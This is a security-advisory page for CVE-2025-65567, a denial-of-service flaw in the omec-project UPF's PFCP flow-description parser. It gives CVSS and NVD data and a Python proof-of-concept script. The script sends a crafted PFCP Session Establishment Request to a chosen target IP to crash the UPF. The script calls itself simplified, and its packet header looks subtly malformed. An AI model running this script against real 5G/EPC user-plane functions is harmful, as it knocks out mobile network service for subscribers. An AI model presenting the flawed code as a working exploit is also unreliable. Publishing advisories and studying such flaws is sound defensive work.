Security Vulnerability Report
中文
CVE-2025-65567 CVSS 7.5 HIGH

CVE-2025-65567

Published: 2025-12-18 19:16:34
Last Modified: 2026-01-07 21:06:42
Source: [email protected]

Description

A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. After PFCP association, a specially crafted PFCP Session Establishment Request with a CreatePDR that contains a malformed Flow-Description is not robustly validated. The Flow-Description parser (parseFlowDesc) can read beyond the bounds of the provided buffer, causing a panic and terminating the UPF process. An attacker who can send PFCP Session Establishment Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:opennetworking:upf:2.1.3:dev:*:*:*:*:*:* - VULNERABLE
upf-epc-pfcpiface 2.1.3-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import struct # PFCP Header Structure # Version(3bit) | MP(1bit) | S(1bit) | PN(3bit) | Message Type(8bit) | Length(24bit) def build_pfcp_header(msg_type, length, sequence=1): # Version=1, MP=0, S=1, PN=1 flags = (1 << 5) | (1 << 3) | 0x01 header = bytes([flags, msg_type]) header += struct.pack('!I', length)[1:] # 3 bytes for length header += struct.pack('!I', sequence)[1:] # 3 bytes for sequence return header def build_create_pdr_with_malformed_flow_desc(): # IE Type for CreatePDR create_pdr_ie_type = 0x01 # Malformed Flow Description - exceeds buffer bounds # This will cause parseFlowDesc to read beyond allocated buffer malformed_flow_desc = b'\x00' * 256 + b'invalid data' # Flow Description IE: Type=14, Length, Flow Description content flow_desc_ie = struct.pack('!B', 14) # IE Type flow_desc_ie += struct.pack('!I', len(malformed_flow_desc))[1:] flow_desc_ie += malformed_flow_desc # CreatePDR IE with malformed content create_pdr = flow_desc_ie # Simplified - actual implementation needs proper IEs # IE header ie_data = struct.pack('!B', create_pdr_ie_type) ie_data += struct.pack('!I', len(create_pdr))[1:] ie_data += create_pdr return ie_data def build_pfcp_session_establishment_request(): # Message Type for Session Establishment = 0x11 msg_type = 0x11 # Build CreatePDR with malformed Flow Description create_pdr = build_create_pdr_with_malformed_flow_desc() # Calculate total length (IE headers + content) total_length = len(create_pdr) # Build PFCP Header header = build_pfcp_header(msg_type, total_length) # Combine header and IE return header + create_pdr def exploit_cve_2025_65567(target_ip, target_port=8805): """ PoC for CVE-2025-65567 Sends a crafted PFCP Session Establishment Request with malformed Flow-Description to trigger buffer over-read in parseFlowDesc function, causing DoS. """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) payload = build_pfcp_session_establishment_request() print(f"[*] Sending malicious PFCP request to {target_ip}:{target_port}") print(f"[*] Payload length: {len(payload)} bytes") sock.sendto(payload, (target_ip, target_port)) print("[+] Malicious request sent") print("[*] Target UPF should crash/panic due to buffer over-read") sock.close() if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve_2025_65567_poc.py <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 8805 exploit_cve_2025_65567(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65567", "sourceIdentifier": "[email protected]", "published": "2025-12-18T19:16:34.190", "lastModified": "2026-01-07T21:06:42.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. After PFCP association, a specially crafted PFCP Session Establishment Request with a CreatePDR that contains a malformed Flow-Description is not robustly validated. The Flow-Description parser (parseFlowDesc) can read beyond the bounds of the provided buffer, causing a panic and terminating the UPF process. An attacker who can send PFCP Session Establishment Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opennetworking:upf:2.1.3:dev:*:*:*:*:*:*", "matchCriteriaId": "E580395D-12BF-4D0A-AA6F-FD59C36E1EED"}]}]}], "references": [{"url": "https://github.com/omec-project/upf/issues/959", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/omec-project/upf/issues/959", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.